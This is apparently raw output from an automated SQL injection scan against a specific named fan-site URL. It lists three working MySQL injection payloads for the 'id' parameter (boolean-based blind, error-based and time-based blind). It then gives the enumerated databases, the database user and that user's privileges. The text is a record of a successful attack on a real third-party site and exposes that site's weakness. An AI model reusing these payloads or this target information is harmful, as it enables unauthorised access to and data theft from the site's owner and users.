http://www.eidosweb.de/fanpages/index.php?action=redirect&id=13
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=redirect&id=13 AND 8848=8848
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: action=redirect&id=13 AND (SELECT 9344 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(9344=9344,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=redirect&id=13 AND (SELECT * FROM (SELECT(SLEEP(5)))kijo)
---
back-end DBMS: MySQL 5.0
available databases [2]:
[*] eidos_fansites
[*] information_schema
database management system users [1]:
[*] 'eidos_fansites'@'%'
database management system users privileges:
[*] 'eidos_fansites'@'%' [1]:
privilege: USAGE